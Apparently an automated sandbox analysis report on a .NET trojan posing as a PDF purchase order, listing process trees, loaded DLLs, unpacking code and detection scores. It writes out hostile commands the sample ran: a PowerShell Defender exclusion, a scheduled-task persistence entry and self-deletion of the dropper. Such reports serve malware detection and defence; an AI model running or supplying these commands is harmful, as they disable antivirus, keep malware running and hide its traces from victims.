Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, RtVBnqFKfMXLSCerqs.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, RtVBnqFKfMXLSCerqs.cs	Security API names: _0020.AddAccessRule
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, a2FbTp8xY7SFAYgAjX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, a2FbTp8xY7SFAYgAjX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.RFQ31072024_August order_pdf.exe.258ac7c.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.RFQ31072024_August order_pdf.exe.5050000.8.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.RFQ31072024_August order_pdf.exe.256a580.5.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.evad.winEXE@27/11@11/4

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_003F2F93 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,

11_2_003F2F93

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_003F7DD0 StartServiceCtrlDispatcherW,GetLastError,

11_2_003F7DD0

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_003F7DD0 StartServiceCtrlDispatcherW,GetLastError,

11_2_003F7DD0

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

File created: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp

Jump to behavior

Source: RFQ31072024_August order_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: RFQ31072024_August order_pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFQ31072024_August order_pdf.exe	ReversingLabs: Detection: 28%
Source: RFQ31072024_August order_pdf.exe	Virustotal: Detection: 37%

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

File read: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe"
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process created: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpF9FC.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process created: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process created: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpF9FC.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process created: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: RFQ31072024_August order_pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: RFQ31072024_August order_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msiexec.pdb source: RFQ31072024_August order_pdf.exe, 00000007.00000002.1488970281.0000000001148000.00000004.00000020.00020000.00000000.sdmp, RFQ31072024_August order_pdf.exe, 00000007.00000002.1488970281.000000000115F000.00000004.00000020.00020000.00000000.sdmp, RFQ31072024_August order_pdf.exe, 00000007.00000002.1490043213.0000000001560000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdb source: EqtGqZpPskFq.exe, 00000010.00000002.1530936851.0000000001467000.00000004.00000020.00020000.00000000.sdmp, EqtGqZpPskFq.exe, 00000010.00000002.1530851810.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.1533557411.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: RFQ31072024_August order_pdf.exe, 00000007.00000002.1488970281.0000000001148000.00000004.00000020.00020000.00000000.sdmp, RFQ31072024_August order_pdf.exe, 00000007.00000002.1488970281.000000000115F000.00000004.00000020.00020000.00000000.sdmp, RFQ31072024_August order_pdf.exe, 00000007.00000002.1490043213.0000000001560000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdbGCTL source: EqtGqZpPskFq.exe, 00000010.00000002.1530936851.0000000001467000.00000004.00000020.00020000.00000000.sdmp, EqtGqZpPskFq.exe, 00000010.00000002.1530851810.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.1533557411.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RFQ31072024_August order_pdf.exe, 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1489881445.0000000004853000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1492894327.0000000004A00000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.1534062684.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.1534062684.00000000050AE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000003.1532526422.0000000004D67000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.1531020029.0000000004BB6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RFQ31072024_August order_pdf.exe, RFQ31072024_August order_pdf.exe, 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1489881445.0000000004853000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1492894327.0000000004A00000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.1534062684.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.1534062684.00000000050AE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000003.1532526422.0000000004D67000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.1531020029.0000000004BB6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.RFQ31072024_August order_pdf.exe.2514450.1.raw.unpack, JwlrlmCCKvmG8rWaC9.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.RFQ31072024_August order_pdf.exe.6960000.9.raw.unpack, JwlrlmCCKvmG8rWaC9.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, RtVBnqFKfMXLSCerqs.cs	.Net Code: o8uBYStlmX System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, RtVBnqFKfMXLSCerqs.cs	.Net Code: o8uBYStlmX System.Reflection.Assembly.Load(byte[])
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, RtVBnqFKfMXLSCerqs.cs	.Net Code: o8uBYStlmX System.Reflection.Assembly.Load(byte[])

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_003F8A55 Sleep,LoadLibraryW,GetProcAddress,

11_2_003F8A55

